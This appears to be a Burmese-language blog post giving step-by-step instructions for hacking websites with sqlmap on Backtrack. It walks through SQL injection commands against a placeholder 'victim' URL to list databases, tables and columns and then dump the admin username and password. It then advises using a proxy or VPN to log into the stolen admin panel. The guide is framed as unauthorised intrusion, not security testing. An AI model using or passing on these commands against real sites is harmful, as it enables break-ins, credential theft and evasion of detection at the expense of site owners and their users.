ကဲ ေအာက္မွာ ကြ်န္ေတာ္ အဆင့္ေလးေတြနဲ႔ ျပေပးထားပါတယ္ Sqlmap Tool ေလးသံုးၿပီး
Backtrack နဲ႔ Website Hack ရေအာင္ဗ်ာ... ေအာက္က အဆင့္ေတြ အတိုင္း လုပ္ေဆာင္သြားပါ...
1. Backtrack terminal ကိုဖြင့္ၿပီး cd /pentest/database/sqlmap လို႔ရိုက္ၿပီး Enter ႏွိပ္ပါ......
သင့္ Terminal ထဲမွာ sqlmap ပြင့္သြားပါမည္.....
2. vulnerable site ကိုရွာပါ (ကြ်န္ေတာ့ဆီမွာ အေစာကတည္းက ရွိၿပီးသားပါ)
3. ဒီ Command ကို Terminal ထဲမွာ ရိုက္ၿပီး Enter ႏွိပ္ပါ..(အေပၚပံုကိုၾကည့္ပါ)
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 –dbs
4. Website ရဲ႕ Database Name ကို သင္ရသြားပါလိမ့္မည္.....
aj နဲ႔ information_schema ဆုိတာ ႏွစ္ခုကို ကြ်န္ေတာ္ရသြားပါၿပီ
ကြ်န္ေတာ္ တို႔ အခု aj ကို ေရြးလိုက္ပါ့မယ္
5. ဒီ database 2 ခုရဲ႕ Table ကိုယူပါ..... ဒီလိုလုပ္ဖို႔ ေအာက္က Command ကုိ Terminal ထဲမွာ ရိုက္ Enter....
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D (database name) –tables
6. aj database က Table ေတြကို ကြ်န္ေတာ္တို႔ ယူပါမယ္..... ေအာက္က Command ေလးရိုက္ေလးလိုက္
ပါဦး.......
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables
7. aj databas ထဲမွာ သိမ္းထားတဲ႔ Table list ကို သင္ရသြားပါလိမ့္မယ္ ေအာက္ပံုကိုၾကည့္ပါ
8. admin table ထဲက Column ေတြကို ယူပါမယ္ .... ေအာက္မွာ Command ရိုက္ပါ
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns
Column ေတြထဲမွာ ကြ်န္ေတာ္တို႔ Username နဲ႔ Password ကိုျမင္ရပါၿပီ
9. Admin Password ကို ယူရေအာင္ဗ်ာ... ေအာက္မွာ Command ရိုက္ပါ..
Website ရဲ႕ Username နဲ႔ Password ကို ရၿပီဗ်ိဳ႕ ထသာကေပေတာ့ !python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test --dump
Website ထဲကို သင္ Admin အျဖစ္နဲ႔ ဝင္ေတာ့မည္ ဆုိလွ်င္ Website ရဲ႕ Admin Panel ကိုရွာၿပီး proxy/vpn သံုးပါ
REF: HackForSec
0 comments:
Post a Comment
ျမန္မာ အိုင္တီ ၿမိဳ႕ေတာ္ သို႔ ၀င္ေရာက္အားေပး သူမ်ားကို အထူးေက်းဇူးတင္ပါသည္။